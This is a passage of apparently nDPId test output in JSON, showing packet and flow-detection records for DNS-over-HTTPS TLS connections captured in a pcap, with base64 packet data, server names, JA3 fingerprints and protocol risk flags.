-02429{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQ
fRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9DqojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELuv+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+
2DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="} 
-01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02376{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/dFIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcFRa4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeA
CLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNIyBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"} -01084{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIG
q1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"thread_ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PY
Nz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJPio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXtcN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcU
